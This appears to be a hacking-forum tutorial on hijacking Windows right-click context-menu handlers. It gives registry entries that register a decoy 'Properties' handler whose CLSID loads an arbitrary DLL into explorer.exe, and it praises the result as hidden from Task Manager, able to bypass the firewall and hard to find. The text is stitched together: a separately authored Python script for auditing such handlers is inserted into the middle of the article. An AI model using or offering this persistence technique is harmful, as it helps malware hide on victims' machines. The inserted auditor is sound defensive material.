
New Startup

By ghostghost | 4649 Reads |

Hello folks… I want to demonstrate a "new" "startup" method to you. Maybe new is the wrong word but, anyway, I have never seen this method elsewhere. Yeah, I googled too! But this differs from the others. Try to google it, you won't find it!

At the end I'll show you the advantages :) And after reading you will see why I'm quoting "new" & "startup".

Ok here we go:

Our target is the context menu that drops down when you right-click a file or directory. Let's take a look at mine (file context menu):

We run regedit and go to HKEY_CLASSES_ROOT\*\shellex\ContextMenuHandlers\

Here are the entries:
[HKEY_CLASSES_ROOT\*\shellex\ContextMenuHandlers\Offline Files]
@="{750fdf0e-2a26-11d1-a3ea-080036587f03}"

[HKEY_CLASSES_ROOT\*\shellex\ContextMenuHandlers\Open With]
@="{09799AFB-AD67-11d1-ABCD-00C04FC30936}"

[HKEY_CLASSES_ROOT\*\shellex\ContextMenuHandlers\Open With EncryptionMenu]
@="{A470F8CF-A1E8-4f65-8335-227475AA5C46}"

[HKEY_CLASSES_ROOT\*\shellex\ContextMenuHandlers\Shell Extension for Malware scanning]
@="{45AC2688-0253-4ED8-97DE-B5370FA7D48A}"

[HKEY_CLASSES_ROOT\*\shellex\ContextMenuHandlers\WinRAR]
@="{B41DB860-8EE4-11D2-9906-E49FADC173CA}"

[HKEY_CLASSES_ROOT\*\shellex\ContextMenuHandlers\{a2a9545d-a0c2-42b4-9708-a0b2badd77c8}]
@="Start Menu Pin"

The directory context menus are similar. View yours here: HKEY_CLASSES_ROOT\Folder\shellex\ContextMenuHandlers\

Now let us look at what … @="{B41DB860-8EE4-11D2-9906-E49FADC173CA}" … means!

We go to HKEY_CLASSES_ROOT\CLSID\ and search for that CLSID.

Yeah, found this:

[HKEY_CLASSES_ROOT\CLSID\{B41DB860-8EE4-11D2-9906-E49FADC173CA}]
@="WinRAR"

[HKEY_CLASSES_ROOT\CLSID\{B41DB860-8EE4-11D2-9906-E49FADC173CA}\InProcServer32]
@="C:\\Programme\\WinRAR\\rarext.dll"
"ThreadingModel"="Apartment"

Hmmm, my first idea was to change the DLL path. So explorer.exe would load it when we right-click (RC) on a file or dir!

Wow, it works. But what's that… explorer hangs up! Hmm! BTW, the DLL is loaded only once, the first time you RC on a file or dir. After that you can't make changes. To make changes you have to kill explorer.exe and then do your changes. Creating a new task "explorer.exe" will give you the next try.

But how do we know if the user has installed WinRAR or similar tools whose entry we could take over?? Nahh… don't think of it! We do it better! First we create a usual-looking Windows entry like Properties (file & dir context) and assign the following CLSID to the default value:

[HKEY_CLASSES_ROOT\*\shellex\ContextMenuHandlers\Properties]
@="{A41D8860-8EE4-11C2-9906-E49FADC173CB}"

[HKEY_CLASSES_ROOT\Folder\shellex\ContextMenuHandlers\Properties]
@="{A41D8860-8EE4-11C2-9906-E49FADC173CB}"

-----------------------------------
And finally the CLSID entry itself:
-----------------------------------
[HKEY_CLASSES_ROOT\CLSID\{A41D8860-8EE4-11C2-9906-E49FADC173CB}\InProcServer32]
@="C:\\some.dll"
"ThreadingModel"="Apartment"

But it's not the end! Now it's your turn to code a working DLL. Just code your DLL like your normal application. That's enough for the start! Careful! Don't code your app/DLL in a blocking loop like: a := true; while a do begin … if user = 'crazy' then begin a := false; end; … end;

Your app/DLL must be able to process messages. Otherwise your explorer will hang up! Now be creative!

=Advantages=
-not shown in Task Manager (injected into explorer.exe)
-firewall bypass (only when the user is stupid enough to let explorer connect to the internet)
-hard to locate in the registry (without extra tools ;)

=Disadvantages=
-startup only on a right-click by the user
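The chain walked above (ContextMenuHandlers entry → CLSID → InProcServer32 DLL) is exactly what a defender enumerates to find such a handler. The following Python example is added here and is not part of the article: it parses a regedit export in the format quoted above and flags handlers whose server DLL is missing or sits outside the usual vendor directories. The embedded .reg text is a constructed excerpt modelled on the article's entries, and the trusted-directory list is an assumption.

```python
import re

# Constructed .reg excerpt modelled on the article's entries (C:\some.dll is its placeholder).
SAMPLE_REG = r"""
[HKEY_CLASSES_ROOT\*\shellex\ContextMenuHandlers\WinRAR]
@="{B41DB860-8EE4-11D2-9906-E49FADC173CA}"
[HKEY_CLASSES_ROOT\*\shellex\ContextMenuHandlers\Properties]
@="{A41D8860-8EE4-11C2-9906-E49FADC173CB}"
[HKEY_CLASSES_ROOT\CLSID\{B41DB860-8EE4-11D2-9906-E49FADC173CA}\InProcServer32]
@="C:\\Programme\\WinRAR\\rarext.dll"
"ThreadingModel"="Apartment"
[HKEY_CLASSES_ROOT\CLSID\{A41D8860-8EE4-11C2-9906-E49FADC173CB}\InProcServer32]
@="C:\\some.dll"
"""

# Where shell-extension DLLs are normally expected (assumption; "Programme" is German Program Files).
TRUSTED_DIRS = ("c:\\windows\\", "c:\\program files\\", "c:\\programme\\")
GUID_RE = re.compile(r"\{[0-9a-f-]{36}\}", re.IGNORECASE)

def parse_reg(text):
    """Parse a regedit export into {key_path: {value_name: string_data}}."""
    keys, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys[current] = {}
        elif current and "=" in line:
            name, data = line.split("=", 1)
            name = "@" if name == "@" else name.strip('"')
            # .reg strings escape \ as \\ and " as \"
            keys[current][name] = data.strip('"').replace('\\"', '"').replace("\\\\", "\\")
    return keys

def audit_handlers(reg_text):
    """Return (handler, clsid, dll_or_None, suspicious) for every ContextMenuHandlers entry."""
    keys = parse_reg(reg_text)
    lower = {k.lower(): v for k, v in keys.items()}
    findings = []
    for path, values in keys.items():
        if "\\shellex\\contextmenuhandlers\\" not in path.lower():
            continue
        name = path.rsplit("\\", 1)[1]
        # Subkey is a label whose default value is the CLSID, or the CLSID itself.
        clsid = name if GUID_RE.fullmatch(name) else values.get("@", "")
        server = lower.get(("HKEY_CLASSES_ROOT\\CLSID\\" + clsid + "\\InProcServer32").lower(), {})
        dll = server.get("@")
        suspicious = dll is None or not dll.lower().startswith(TRUSTED_DIRS)
        findings.append((name, clsid, dll, suspicious))
    return findings
```

On a live system the same logic applies to a `reg export HKCR\CLSID` dump plus the `*` and `Folder` ContextMenuHandlers keys; a handler whose DLL is unsigned or outside a vendor directory deserves a closer look.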

Whoa… phew, my fingers… I hope I brought you some useful information! If someone has improvements, message me. Did I make some grammar mistakes? Excuse me. Correct me if you found something, or if something is not clear enough!

And remember, only for education …;) KNOWLEDGE is POWER and that is what we want!
